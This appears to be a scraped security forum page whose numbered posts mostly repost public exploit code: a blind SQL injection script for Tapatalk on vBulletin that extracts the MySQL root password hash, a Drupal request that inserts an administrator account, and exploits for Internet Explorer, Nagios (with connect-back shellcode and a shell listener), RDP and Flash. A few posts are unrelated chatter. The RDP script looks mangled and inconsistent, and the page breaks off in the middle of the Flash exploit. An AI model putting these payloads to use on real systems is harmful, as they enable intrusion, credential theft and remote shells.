            print """
            SELECT subscribeforumid FROM subscribeforum AS subscribeforum
            LEFT JOIN user AS user ON (user.userid=subscribeforum.userid)
            WHERE subscribeforumid = %s AND subscribeforum.userid = 0""" % query
        return self.rpc.unsubscribe_forum("s_%s" % query)  # no escape, invalid_char="_"

    def attack_blind(self, sqli, sleep=2):
        return self.attack_func(sqli, sleep=sleep)
        #return self.attack_func("-1 OR subscribethreadid = ( %s AND (select sleep(4)) ) UNION SELECT 'aaa' FROM subscribethread WHERE subscribethreadid = -1 OR 1 "%sqli)

    def attack_blind_guess(self, query, column, charset=string.ascii_letters + string.digits, maxlength=32, sleep=2, case=True):
        '''
        provide <query> = select -1 from user where user='debian-sys-maint' where <COLUMN> <GUESS>
        '''
        hit = False
        # PHASE 1 - guess entry length
        print "[ ] trying to guess length ..."
        for guess_length in xrange(maxlength + 1):
            q = query.replace("<COLUMN>", "length(%s)" % column).replace("<GUESS>", "= %s" % guess_length)
            self.stopwatch()
            self.attack_blind(q, sleep)
            duration = self.stopwatch()
            print ".",
            if duration >= sleep - sleep / 8:
                # HIT! - got length! => guess_length
                hit = True
                print ""
                break
        if not hit:
            print "[ !!] unable to guess password length, check query!"
            return None
        print "[ *] LENGTH = %s" % guess_length

        # PHASE 2 - guess password up to length
        print "[ ] trying to guess value ..."
        hits = 0
        result = ""
        for pos in xrange(guess_length):  # for each char pos in up to guessed length
            for attempt in self.bruteforce(charset, 1):  # probe all chars in charset
                #attempt = re.escape(attempt)
                if attempt == "%%":
                    attempt = "\%"
                # LIKE binary = case sensitive. might be better to do caseinsensitive search + recheck case with binary
                q = query.replace("<COLUMN>", column).replace("<GUESS>", "LIKE '%s%s%%' " % (result, attempt))
                self.stopwatch()
                self.attack_blind(q, sleep)
                duration = self.stopwatch()
                #print result,attempt," ",duration
                print ".",
                if duration >= sleep - sleep / 8:
                    if case:
                        # case insensitive hit - recheck case: this is drastically reducing queries needed.
                        q = query.replace("<COLUMN>", column).replace("<GUESS>", "LIKE binary '%s%s%%' " % (result, attempt.lower()))
                        self.stopwatch()
                        self.attack_blind(q, sleep)
                        duration = self.stopwatch()
                        if duration >= sleep - sleep / 8:
                            attempt = attempt.lower()
                        else:
                            attempt = attempt.upper()
                        # case sensitive - end
                    # HIT! - got length! => guess_length
                    hits += 1
                    print ""
                    print "[ +] HIT! - %s[%s].." % (result, attempt)
                    result += attempt
                    break
        if not hits == guess_length:
            print "[ !!] unable to guess password length, check query!"
            return None
        print "[ *] SUCCESS!: query: %s" % (query.replace("<COLUMN>", column).replace("<GUESS>", "='%s'" % result))
        return result

    def bruteforce(self, charset, maxlength):
        return (''.join(candidate) for candidate in itertools.chain.from_iterable(itertools.product(charset, repeat=i) for i in range(1, maxlength + 1)))

    def stopwatch(self):
        stop = time.time()
        diff = stop - self.stopwatch_start
        self.stopwatch_start = stop
        return diff


if __name__ == "__main__":
    #googledork: https://www.google.at/search?q=Tapatalk+Banner+head+start
    DEBUG = False
    TARGET = "http://TARGET/vbb4/forum.php"

    x = Exploit(TARGET, debug=DEBUG)
    print "[ ] TAPATALK for vBulletin 4.x - SQLi"
    print "[--] Target: %s" % TARGET
    if DEBUG:
        print "[--] DEBUG-Mode!"
    print "[ +] Attack - sqli"

    query = u"-1 UNION SELECT 1%s" % unichr(0)
    if DEBUG:
        print u"""
        SELECT subscribeforumid FROM subscribeforum AS subscribeforum
        LEFT JOIN user AS user ON (user.userid=subscribeforum.userid)
        WHERE subscribeforumid = %s AND subscribeforum.userid = 0""" % query

    print "[ *] guess mysql user/pass"
    print x.attack_blind_guess("select -1 from mysql.user where user='root' and <COLUMN> <GUESS>", column="password", charset="*" + string.hexdigits, maxlength=45)  # usually 40 chars + 1
    print "[ *] guess apikey"
    print x.attack_blind_guess("select -1 from setting where varname='apikey' and <COLUMN> <GUESS>", column='value', charset=string.ascii_letters + string.digits, maxlength=14, )
    print "-- done --"

Source: vBulletin Tapatalk - Blind SQL Injection
  9. I'll join in too if two more people sign up.
  10. FindWindow, FindWindowEx, GetWindowRect. There are many Windows functions you can use: Window Functions (Windows). I don't know what AutoIt offers you, though.
  11. Drupal CVE-2014-3704 insert new user
    POST /drupal/?q=node&destination=node HTTP/1.1
    TE: deflate,gzip;q=0.3
    Connection: TE, close
    Host: 192.168.88.88
    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.9.2a1pre) Gecko
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 258

    name[0%20;insert+into+users+%28uid%2cname%2cpass%2cstatus%29+values+%28123456%2c'greenbull'%2c'$S$DkH0O9Lpt5i1oUi9yYeouLW0ZCAHo/u75ReE1zjCPaPbZoVZQX/m'%2c1%29;;#%20%20]=nTzlWXKY&name[0]=ptSHbjbW&pass=o81NgWxc&form_build_id=&form_id=user_login_block&op=Log+in
  12. You can use the "Free stuff" category if you want to give something away. Give it to whoever you want, on whatever criteria you want. Good luck!
  13. Whoa: http://www.vbulletin.com/forum/forum/vbulletin-announcements/vbulletin-announcements_aa/4182969-security-patch-release-for-vbulletin-connect-5-0-0-5-1-4
  14. Whoa: http://www.vbulletin.com/forum/forum/vbulletin-announcements/vbulletin-announcements_aa/4183258-security-exploit-fixed-in-vbulletin-4-2-2-and-4-2-3
  15. I want to see 20-30 things that you donate before you start giving your opinion.
  16. Friday is OWASP. See you there.
  17. There are a few useful things, but nothing special. Other interesting forums are: opensc, trojanforge, rohitab, tuts4you, kernelmode and many others. And @giv's reversing.ro.
  18. CCleaner Pro Patching Tut by Kjacky Home Page: http://www.piriform.com/ Tutorial: CCP Source: EXETOOLS FORUM
  19. CVE-2014-1815 Html code - Internet Explorer 6-11
    CVE-2014-1815 Html code
    < !doctype html>
    < html>
    < head>
    < meta http-equiv="Cache-Control" content="no-cache"/>
    < sc?ript >
    func?tion stc()
    {
    var Then = new Date();
    Then.setTime(Then.getTime() + 1000 * 3600 * 24 * 7 );
    document.cookie = "Cookie1=d93kaj3Nja3; expires="+ Then.toGMTString();
    }
    func?tion cid()
    {
    var swf = 0;
    try { swf = new ActiveXObject('ShockwaveFlash.ShockwaveFlash'); } catch (e) {
    }
    if (!swf)
    return 0;
    var cookieString = new String(document.cookie);
    if(cookieString.indexOf("d93kaj3Nja3") == -1)
    {stc(); return 1;}else{ return 0;}
    }
    String.prototype.repeat=func?tion (i){return new Array(isNaN(i)?1:++i).join(this);}
    var tpx=un?escape ("%u1414%u1414").repeat(0x60/4-1);
    var ll=new Array();
    for (i=0;i< 3333;i++)ll.push(document.create?Element("img"));
    for(i=0;i< 3333;i++) ll[i].className=tpx;
    for(i=0;i< 3333;i++) ll[i].className="";
    CollectGarbage();
    func?tion b2()
    {
    try{xdd.re?placeNode(document.createTextNode(" "));}catch(exception){}
    try{xdd.outerText='';}catch(exception){}
    CollectGarbage();
    for(i=0;i< 3333;i++) ll[i].className=tpx;
    }
    func?tion a1(){
    if (!cid())
    return;
    document.body.contentEditable="true";
    try{xdd.applyElement(document.create?Element("frameset"));}catch(exception){}
    try{document.selection.createRange().select();}catch(exception){}
    }
    < / sc?ript >
    < /head>
    < body onload='setTimeout("a1();",2000);' onresize=b2()>
    < marquee id=xdd > < /marquee>
    < object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" width="1%" height="1%" id="FE">
    < param name="movie" value="storm.swf" />
    < param name="quality" value="high" />
    < param name="bgcolor" value="#ffffff" />
    < param name="allowScriptAccess" value="sameDomain" />
    < param name="allowFullScreen" value="true" />
    < /object>
    < /body>
    < body>
    < form name=loading>
    < p align=center> < font color="#0066ff" size="2"> Loading....,Please Wait< /font> < font color="#0066ff" size="2" face="verdana"> ...< /font>
    < input type=text name=chart size=46 style="font-family:verdana; font-weight:bolder; color:#0066ff; background-color:#fef4d9; padding:0px; border-style:none;">

    < input type=text name=percent size=47 style="color:#0066ff; text-align:center; border-width:medium; border-style:none;">
    < sc?ript >
    var bar=0
    var line="||"
    var amount="||"
    count()
    func?tion count(){
    bar=bar+2
    amount =amount + line
    document.loading.chart.value=amount
    document.loading.percent.value=bar+"%"
    if (bar< 99)
    {setTimeout("count()",500);}
    else
    {window.location = "http://www.google.com.hk";}
    }< / sc?ript >
    < /p>
    < /form>
    < p align="center"> Wart,< a style="text-decoration: none" href="http://www.google.com.hk"> < font color="#FF0000"> kick me< /font> < /a> .< /p>
    < /body>
    < /html>
    Source: CVE-2014-1815 Html code - Pastebin.com
  20. CVE-2012-6096 - Nagios history.cgi Remote Command Execution
    #!/usr/bin/python
    #
    # CVE-2012-6096 - Nagios history.cgi Remote Command Execution
    # ===========================================================
    # Another year, another reincarnation of classic and trivial
    # bugs to exploit. This time we attack Nagios.. or more
    # specifically, one of its CGI scripts. [1]
    #
    # The Nagios code is an amazing monster. It reminds me a
    # lot of some of my early experiments in C, back when I
    # still had no clue what I was doing. (Ok, fair enough,
    # I still don't, heheh.)
    #
    # Ok, I'll come clean. This exploit doesn't exactly
    # defeat FORTIFY. This approach is likely to work just FINE
    # on other crippled distro's though, think of stuff like
    # ArchLinux, Slackware, and all those Gentoo kids twiddling
    # their CFLAGS. [2] (Oh and hey, BSD and stuff!)
    #
    # I do some very stupid shit(tm) here that might make an
    # exploit coder or two cringe. My sincere apologies for that.
    #
    # Cold beer goes out to my friends who are still practicing
    # this dying but interesting type of art:
    #
    # * brainsmoke * masc * iZsh * skier_ * steve *
    #
    # -- blasty <blasty@fail0verflow.com> / 2013-01-08
    #
    # References:
    # [1] http://permalink.gmane.org/gmane.comp.security.oss.general/9109
    # [2] http://www.funroll-loops.info/
    #
    # P.S. To the clown who rebranded my Samba exploit: j00 s0 1337 m4n!
    # Next time you rebrand an exploit at least show some diligence and
    # add some additional targets or improvements, so we can all profit!
    #
    # P.P.S. hey, Im not _burning_ bugs .. this is a 2day, enjoy!
    #

    import os, sys, socket, struct, urllib, threading, SocketServer, time
    from base64 import b64encode

    SocketServer.TCPServer.allow_reuse_address = True

    targets = [
        {
            "name"       : "Debian (nagios3_3.0.6-4~lenny2_i386.deb)",
            "smash_len"  : 0xc37,
            "unescape"   : 0x0804b620,
            "popret"     : 0x08048fe4,
            "hostbuf"    : 0x080727a0,
            "system_plt" : 0x08048c7c
        }
    ]

    def u32h(v):
        return struct.pack("<L", v).encode('hex')

    def u32(v, hex = False):
        return struct.pack("<L", v)

    # Tiny ELF stub based on:
    # http://www.muppetlabs.com/~breadbox/software/tiny/teensy.html
    def make_elf(sc):
        elf_head = \
            "7f454c46010101000000000000000000" + \
            "02000300010000005480040834000000" + \
            "00000000000000003400200001000000" + \
            "00000000010000000000000000800408" + \
            "00800408" + u32h(0x54+len(sc))*2 + \
            "0500000000100000"
        return elf_head.decode("hex") + sc

    # interactive connectback listener
    class connectback_shell(SocketServer.BaseRequestHandler):
        def handle(self):
            print "\n[!!] K4P0W!@# -> shell from %s" % self.client_address[0]
            print "[**] This shell is powered by insane amounts of illegal substances"
            s = self.request
            import termios, tty, select, os
            old_settings = termios.tcgetattr(0)
            try:
                tty.setcbreak(0)
                c = True
                os.write(s.fileno(), "id\nuname -a\n")
                while c:
                    for i in select.select([0, s.fileno()], [], [], 0)[0]:
                        c = os.read(i, 1024)
                        if c:
                            if i == 0:
                                os.write(1, c)
                            os.write(s.fileno() if i == 0 else 1, c)
            except KeyboardInterrupt:
                pass
            finally:
                termios.tcsetattr(0, termios.TCSADRAIN, old_settings)
            return

    class ThreadedTCPServer(SocketServer.ThreadingMixIn, SocketServer.TCPServer):
        pass

    if len(sys.argv) != 5:
        print "\n >> Nagios 3.x CGI remote code execution by <blasty@fail0verflow.com>"
        print " >> \"Jetzt geht's Nagi-los!\"\n"
        print " usage: %s <base_uri> <myip> <myport> <target>\n" % (sys.argv[0])
        print " targets:"
        i = 0
        for target in targets:
            print " %02d) %s" % (i, target['name'])
            i = i+1
        print ""
        sys.exit(-1)

    target_no = int(sys.argv[4])
    if target_no < 0 or target_no > len(targets):
        print "Invalid target specified"
        sys.exit(-1)

    target = targets[ int(sys.argv[4]) ]

    # comment this shit if you want to setup your own listener
    server = ThreadedTCPServer((sys.argv[2], int(sys.argv[3])), connectback_shell)
    server_thread = threading.Thread(target=server.serve_forever)
    server_thread.daemon = True
    server_thread.start()

    # shellcode to be executed
    # vanilla x86/linux connectback written by a dutch gentleman
    # close to a decade ago.
    cback = \
        "31c031db31c951b10651b10151b10251" + \
        "89e1b301b066cd8089c231c031c95151" + \
        "68badc0ded6668b0efb102665189e7b3" + \
        "1053575289e1b303b066cd8031c939c1" + \
        "740631c0b001cd8031c0b03f89d3cd80" + \
        "31c0b03f89d3b101cd8031c0b03f89d3" + \
        "b102cd8031c031d250686e2f7368682f" + \
        "2f626989e3505389e1b00bcd8031c0b0" + \
        "01cd80"

    cback = cback.replace("badc0ded", socket.inet_aton(sys.argv[2]).encode("hex"))
    cback = cback.replace("b0ef", struct.pack(">H", int(sys.argv[3])).encode("hex"))

    # Eww.. so there's some characters that dont survive the trip..
    # yes, even with the unescape() call in our return-chain..
    # initially I was going to use some /dev/tcp based connectback..
    # but /dev/tcp isn't available/accesible everywhere, so instead
    # we drop an ELF into /tmp and execute that. The '>' characters
    # also doesn't survive the trip so we work around this by using
    # the tee(1) utility.
    # If your target has a /tmp that is mounted with noexec flag,
    # is severely firewalled or guarded by trained (watch)dogs..
    # you might want to reconsider this approach!
    cmd = \
        "rm -rf /tmp/x;" + \
        "echo " + b64encode(make_elf(cback.decode('hex'))) + "|" + \
        "base64 -d|tee /tmp/x|chmod +x /tmp/x;/tmp/x;"

    # Spaces (0x20) are also a problem, they always ends up as '+'
    # so apply some olde trick and rely on $IFS for argv separation
    cmd = cmd.replace(" ", "${IFS}")

    # Basic return-2-whatever/ROP chain.
    # We return into cgi_input_unescape() to get rid of
    # URL escaping in a static buffer we control, and then
    # we return into system@plt for the moneyshot.
    #
    # Ergo sum:
    # There's no memoryleak or whatever needed to leak libc
    # base and bypass ASLR.. This entire Nagios PoS is stringed
    # together by system() calls, so pretty much every single one
    # of their little silly binaries comes with a PLT entry for
    # system(), huzzah!
    rop = [
        u32(target['unescape']),
        u32(target['popret']),
        u32(target['hostbuf']),
        u32(target['system_plt']),
        u32(0xdeafbabe),
        u32(target['hostbuf'])
    ]

    # Yes.. urllib, so it supports HTTPS, basic-auth and whatnot
    # out of the box. Building HTTP requests from scratch is so 90ies..
    params = urllib.urlencode({
        'host' : cmd + "A"*(target['smash_len']-len(cmd)) + "".join(rop)
    })

    print "[>>] CL1Q .."
    f = urllib.urlopen(sys.argv[1]+"/cgi-bin/history.cgi?%s" % params)
    print "[>>] CL4Q .."
    f.read()

    # TRIAL PERIOD ACTIVE, LOL!
    time.sleep(0x666)
    server.shutdown()
    Source: [Python] CVE-2012-6096 exploit - Pastebin.com
  21. CVE-2012-0002 - Remote Desktop Protocol (RDP) #!/usr/bin/env python ############################################################################# # MS12-020 Exploit by Sabu # sabu@fbi.gov # Uses FreeRDP ############################################################################# import struct import sys from freerdp import rdpRdp from freerdp import crypto from freerdp.rdpRdp import rdpNego #bind shellcode TCP port 4444 shellcode = '\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90' shellcode += '\x29\xc9\x83\xe9\xb0\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e\xe9' shellcode += '\x4a\xb6\xa9\x83\xee\xfc\xe2\xf4\x15\x20\x5d\xe4\x01\xb3\x49\x56' shellcode += '\x16\x2a\x3d\xc5\xcd\x6e\x3d\xec\xd5\xc1\xca\xac\x91\x4b\x59\x22' shellcode += '\xa6\x52\x3d\xf6\xc9\x4b\x5d\xe0\x62\x7e\x3d\xa8\x07\x7b\x76\x30' shellcode += '\x45\xce\x76\xdd\xee\x8b\x7c\xa4\xe8\x88\x5d\x5d\xd2\x1e\x92\x81' shellcode += '\x9c\xaf\x3d\xf6\xcd\x4b\x5d\xcf\x62\x46\xfd\x22\xb6\x56\xb7\x42' shellcode += '\xea\x66\x3d\x20\x85\x6e\xaa\xc8\x2a\x7b\x6d\xcd\x62\x09\x86\x22' shellcode += '\xa9\x46\x3d\xd9\xf5\xe7\x3d\xe9\xe1\x14\xde\x27\xa7\x44\x5a\xf9' shellcode += '\x16\x9c\xd0\xfa\x8f\x22\x85\x9b\x81\x3d\xc5\x9b\xb6\x1e\x49\x79' shellcode += '\x81\x81\x5b\x55\xd2\x1a\x49\x7f\xb6\xc3\x53\xcf\x68\xa7\xbe\xab' shellcode += '\xbc\x20\xb4\x56\x39\x22\x6f\xa0\x1c\xe7\xe1\x56\x3f\x19\xe5\xfa' shellcode += '\xba\x19\xf5\xfa\xaa\x19\x49\x79\x8f\x22\xa7\xf5\x8f\x19\x3f\x48' shellcode += '\x7c\x22\x12\xb3\x99\x8d\xe1\x56\x3f\x20\xa6\xf8\xbc\xb5\x66\xc1' shellcode += '\x4d\xe7\x98\x40\xbe\xb5\x60\xfa\xbc\xb5\x66\xc1\x0c\x03\x30\xe0' shellcode += '\xbe\xb5\x60\xf9\xbd\x1e\xe3\x56\x39\xd9\xde\x4e\x90\x8c\xcf\xfe' shellcode += '\x16\x9c\xe3\x56\x39\x2c\xdc\xcd\x8f\x22\xd5\xc4\x60\xaf\xdc\xf9' shellcode += '\xb0\x63\x7a\x20\x0e\x20\xf2\x20\x0b\x7b\x76\x5a\x43\xb4\xf4\x84' shellcode += '\x17\x08\x9a\x3a\x64\x30\x8e\x02\x42\xe1\xde\xdb\x17\xf9\xa0\x56' shellcode += 
'\x9c\x0e\x49\x7f\xb2\x1d\xe4\xf8\xb8\x1b\xdc\xa8\xb8\x1b\xe3\xf8' shellcode += '\x16\x9a\xde\x04\x30\x4f\x78\xfa\x16\x9c\xdc\x56\x16\x7d\x49\x79' shellcode += '\x62\x1d\x4a\x2a\x2d\x2e\x49\x7f\xbb\xb5\x66\xc1\x19\xc0\xb2\xf6' shellcode += '\xba\xb5\x60\x56\x39\x4a\xb6\xa9' #Payload payload = '\x41\x00\x5c\x00' payload += '\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49' payload += '\x49\x49\x49\x49\x49\x49\x49\x49\x49\x37\x49\x49\x51\x5a\x6a\x68' payload += '\x58\x30\x41\x31\x50\x42\x41\x6b\x42\x41\x78\x42\x32\x42\x41\x32' payload += '\x41\x41\x30\x41\x41\x58\x38\x42\x42\x50\x75\x4b\x59\x49\x6c\x43' payload += '\x5a\x7a\x4b\x32\x6d\x5a\x48\x5a\x59\x69\x6f\x4b\x4f\x39\x6f\x71' payload += '\x70\x6e\x6b\x62\x4c\x44\x64\x71\x34\x4c\x4b\x62\x65\x75\x6c\x4c' payload += '\x4b\x63\x4c\x76\x65\x70\x78\x35\x51\x48\x6f\x6c\x4b\x50\x4f\x74' payload += '\x58\x6e\x6b\x33\x6f\x55\x70\x37\x71\x48\x6b\x57\x39\x6c\x4b\x66' payload += '\x54\x6e\x6b\x46\x61\x7a\x4e\x47\x41\x6b\x70\x7a\x39\x4c\x6c\x4c' payload += '\x44\x6f\x30\x62\x54\x44\x47\x38\x41\x4b\x7a\x54\x4d\x44\x41\x4b' payload += '\x72\x78\x6b\x39\x64\x35\x6b\x53\x64\x75\x74\x46\x48\x72\x55\x79' payload += '\x75\x6c\x4b\x53\x6f\x76\x44\x44\x41\x48\x6b\x35\x36\x4e\x6b\x54' payload += '\x4c\x30\x4b\x6c\x4b\x51\x4f\x65\x4c\x65\x51\x38\x6b\x77\x73\x36' payload += '\x4c\x4e\x6b\x6e\x69\x30\x6c\x66\x44\x45\x4c\x30\x61\x69\x53\x30' payload += '\x31\x79\x4b\x43\x54\x6c\x4b\x63\x73\x44\x70\x4e\x6b\x77\x30\x66' payload += '\x6c\x6c\x4b\x72\x50\x45\x4c\x4c\x6d\x4e\x6b\x73\x70\x64\x48\x73' payload += '\x6e\x55\x38\x6e\x6e\x32\x6e\x34\x4e\x58\x6c\x62\x70\x39\x6f\x6b' payload += '\x66\x70\x66\x61\x43\x52\x46\x71\x78\x30\x33\x55\x62\x63\x58\x63' payload += '\x47\x34\x33\x65\x62\x41\x4f\x30\x54\x39\x6f\x4a\x70\x52\x48\x5a' payload += '\x6b\x38\x6d\x6b\x4c\x75\x6b\x30\x50\x6b\x4f\x6e\x36\x53\x6f\x6f' payload += '\x79\x4a\x45\x32\x46\x6f\x71\x6a\x4d\x34\x48\x77\x72\x73\x65\x73' payload += 
'\x5a\x37\x72\x69\x6f\x58\x50\x52\x48\x4e\x39\x76\x69\x4a\x55\x4c' payload += '\x6d\x32\x77\x69\x6f\x59\x46\x50\x53\x43\x63\x41\x43\x70\x53\x70' payload += '\x53\x43\x73\x50\x53\x62\x63\x70\x53\x79\x6f\x6a\x70\x35\x36\x61' payload += '\x78\x71\x32\x78\x38\x71\x76\x30\x53\x4b\x39\x69\x71\x4d\x45\x33' payload += '\x58\x6c\x64\x47\x6a\x74\x30\x5a\x67\x43\x67\x79\x6f\x39\x46\x32' payload += '\x4a\x56\x70\x66\x31\x76\x35\x59\x6f\x58\x50\x32\x48\x4d\x74\x4e' payload += '\x4d\x66\x4e\x7a\x49\x50\x57\x6b\x4f\x6e\x36\x46\x33\x56\x35\x39' payload += '\x6f\x78\x50\x33\x58\x6b\x55\x51\x59\x4e\x66\x50\x49\x51\x47\x39' payload += '\x6f\x48\x56\x32\x70\x32\x74\x62\x74\x46\x35\x4b\x4f\x38\x50\x6e' payload += '\x73\x55\x38\x4d\x37\x71\x69\x69\x56\x71\x69\x61\x47\x6b\x4f\x6e' payload += '\x36\x36\x35\x79\x6f\x6a\x70\x55\x36\x31\x7a\x71\x74\x32\x46\x51' payload += '\x78\x52\x43\x70\x6d\x4f\x79\x4d\x35\x72\x4a\x66\x30\x42\x79\x64' payload += '\x69\x7a\x6c\x4b\x39\x48\x67\x62\x4a\x57\x34\x4f\x79\x6d\x32\x37' payload += '\x41\x6b\x70\x7a\x53\x6e\x4a\x69\x6e\x32\x62\x46\x4d\x6b\x4e\x70' payload += '\x42\x44\x6c\x4c\x53\x6e\x6d\x31\x6a\x64\x78\x4c\x6b\x4e\x4b\x4e' payload += '\x4b\x43\x58\x70\x72\x69\x6e\x6d\x63\x37\x66\x79\x6f\x63\x45\x73' payload += '\x74\x4b\x4f\x7a\x76\x63\x6b\x31\x47\x72\x72\x41\x41\x50\x51\x61' payload += '\x41\x70\x6a\x63\x31\x41\x41\x46\x31\x71\x45\x51\x41\x4b\x4f\x78' payload += '\x50\x52\x48\x4c\x6d\x79\x49\x54\x45\x38\x4e\x53\x63\x6b\x4f\x6e' payload += '\x36\x30\x6a\x49\x6f\x6b\x4f\x70\x37\x4b\x4f\x4e\x30\x4e\x6b\x30' payload += '\x57\x69\x6c\x6b\x33\x4b\x74\x62\x44\x79\x6f\x6b\x66\x66\x32\x6b' payload += '\x4f\x4e\x30\x53\x58\x58\x70\x4e\x6a\x55\x54\x41\x4f\x52\x73\x4b' payload += '\x4f\x69\x46\x4b\x4f\x6e\x30\x68'; class SRVSVC_Exploit(Thread): def __init__(self, target, port=3389): super(SRVSVC_Exploit, self).__init__() self.__port = port self.target = target def __DCEPacket(self): print '[-]Connecting' self.__trans = 
            rdp.transport.cert('rdp_np:%s\\x00\\x89]' % self.target)
            self.__trans.connect()
            print '[-]connected' % self.target
            # Making teh packet
            self.__stub='\x01\x00\x00\x00'
            self.__stub+='\xd6\x00\x00\x00\x00\x00\x00\x00\xd6\x00\x00\x00'
            self.__stub+=shellcode
            self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
            self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
            self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
            self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
            self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
            self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
            self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
            self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
            self.__stub+='\x00\x00\x00\x00'
            self.__stub+='\x2f\x00\x00\x00\x00\x00\x00\x00\x2f\x00\x00\x00'
            self.__stub+=payload
            self.__stub+='\x00\x00\x00\x00'
            self.__stub+='\x02\x00\x00\x00\x02\x00\x00\x00'
            self.__stub+='\x00\x00\x00\x00\x02\x00\x00\x00'
            self.__stub+='\x5c\x00\x00\x00\x01\x00\x00\x00'
            self.__stub+='\x01\x00\x00\x00\x90\x90\xb0\x53\x6b\xC0\x28\x03\xd8\xff\xd3'
            return

        def run(self):
            self.__DCEPacket()
            self.__dce.call(0x1f, self.__stub)
            print '[-]Exploit successfull!...\nTelnet to port 4444 on target machine.'

    if __name__ == '__main__':
        target = sys.argv[1]
        print '\nUsage: %s <target ip> \n' % sys.argv[0]
        sys.exit(-1)
        current = SRVSVC_Exploit(target)
        current.start()
    Note: this crappy syntax highlighter throws in spaces all over the place. Grab it from the source.
    Source: [Python] CVE-2012-0002 - Pastebin.com
  22. CVE-2014-0556
    By: hdarwin on Sep 27th, 2014 (edited)
    /*
    <html>
    <head>
    <title>CVE-2014-0556</title>
    </head>
    <body>
    <object id="swf" width="100%" height="100%" data="NewProject.swf" type="application/x-shockwave-flash"></object><br>
    <button onclick="swf.exploit()">STOP</button>
    </body>
    </html>
    */
    /*
    First chance exceptions are reported before any exception handling.
    This exception may be expected and handled.
    eax=0908a008 ebx=02ffa6a0 ecx=0b51f020 edx=4141411c esi=06a62020 edi=06a62020
    eip=4141411c esp=02ffa5e4 ebp=02ffa610 iopl=0 nv up ei pl nz na po nc
    cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210202
    4141411c ?? ???
    */
    package
    {
        import flash.events.*
        import flash.media.*
        import flash.display.*
        import flash.geom.*
        import flash.utils.*
        import flash.text.*
        import flash.system.Capabilities;
        import flash.external.ExternalInterface

        public class Main extends Sprite
        {
            private var i0:uint
            private var i1:uint
            private var i2:uint
            private var i3:uint
            private var str:String = new String("CVE: CVE-2014-0556\nAuthor: hdarwin (@hdarwin89)\nTested on: Win7 SP1 x86 & " + Capabilities.version)
            private var ba:Vector.<ByteArray> = new Vector.<ByteArray>(3200)
            private var ob:Vector.<Object> = new Vector.<Object>(6400)
            private var bitmap:BitmapData = new BitmapData(0x100, 4, true, 0xffffffff)
            private var rect:Rectangle = new Rectangle(0, 0, 0x100, 4)
            private var snd:Sound
            private var vector:uint

            public function Main():void
            {
                for (i0 = 0; i0 < 3200; i0++) {
                    ba[i0] = new ByteArray()
                    ba[i0].length = 0x2000
                    ba[i0].position = 0xfffff000
                }
                for (i0 = 0; i0 < 3200; i0++) {
                    if (i0 % 2 == 0) ba[i0] = null
                    ob[i0 * 2] = new Vector.<uint>(1008)
                    ob[i0 * 2 + 1] = new Vector.<uint>(1008)
                }
                bitmap.copyPixelsToByteArray(rect, ba[1601])
                for (i0 = 0; ; i0++) if (ob[i0].length != 1008) break
                ob[i0][1024 * 3 - 2] = 0xffffffff
                for (i1 = 0; ; i1++) {
                    if (i0 == i1) continue
                    if (ob[i1].length !=
1008) break } ob[i1][0xFFFFFFFE - 1024 * 3] = 0xffffffff ob[i1][0xFFFFFFFE - 1024 * 3 + 1] = ob[i0][1024 * 3 - 1] ob[i0].fixed = true for (i2 = 1000; ; i2++) { if ( ob[i1][0xFFFFFFFF - i2 + 0] == 0 && ob[i1][0xFFFFFFFF - i2 + 10] == 1 && ob[i1][0xFFFFFFFF - i2 + 5] == ob[i1][0xFFFFFFFF - i2 + 15] ) { vector = ob[i1][0xFFFFFFFF - i2 + 11] str += "\n\nVector<uint> Address : " + vector.toString(16) break }else if ( ob[i1][i2 + 0] == 0 && ob[i1][i2 + 10] == 1 && ob[i1][i2 + 5] == ob[i1][i2 + 15] ) { vector = ob[i1][i2 + 11] str += "\n\nVector<uint> Address : " + vector.toString(16) break } } snd = new Sound() for (i2 = 0; i2 < 6400; i2++) { if (i2 == i0 || i2 == i1) continue ob[i2] = null ob[i2] = new Vector.<Object>(1014) ob[i2][0] = snd ob[i2][1] = snd } for (i2 = 0; ; i2++) { if (ob[i0][i2 + 0] == 1014 && ob[i0][i2 + 1] == ob[i0][i2 + 2] && ob[i0][i2 + 3] == 1 ) { str += "\n\nDump Vector<Object>" for (i3 = 0; i3 < 20; i3++) { if (i3 % 4 == 0) str += "\n" str += zeroPad(ob[i0][i2 + i3 - 9].toString(16), 8) + "\t" } str += "\n\nDump Sound Object" for (i3 = 0; i3 < 20; i3++) { if (i3 % 4 == 0) str += "\n" str += zeroPad(read(ob[i0][i2 + 1] - 1 + (4 * i3)).toString(16), 8) + "\t" } str += "\n\nDump Sound Object V-Table" for (i3 = 0; i3 < 20; i3++) { if (i3 % 4 == 0) str += "\n" str += zeroPad(read(read(ob[i0][i2 + 1] - 1) + (4 * i3)).toString(16), 8) + "\t" } str += "\n\n*** V-Table Modify ***" write(ob[i0][i2 + 1] - 1, vector + 8) for (i3 = 0; i3 < 1008; i3++) { ob[i0][i3] = 0x41414100 | i3 } str += "\n\nDump Sound Object" for (i3 = 0; i3 < 20; i3++) { if (i3 % 4 == 0) str += "\n" str += zeroPad(read(ob[i0][i2 + 1] - 1 + (4 * i3)).toString(16), 8) + "\t" } str += "\n\nDump Sound Object V-Table" for (i3 = 0; i3 < 20; i3++) { if (i3 % 4 == 0) str += "\n" str += zeroPad(read(read(ob[i0][i2 + 1] - 1) + (4 * i3)).toString(16), 8) + "\t" } break } } ob[i1][0xFFFFFFFE - 1024 * 3] = 4096 ob[i0][1024 * 3 - 2] = 0 var tf:TextField = new TextField(); tf.width = 800; tf.height = 
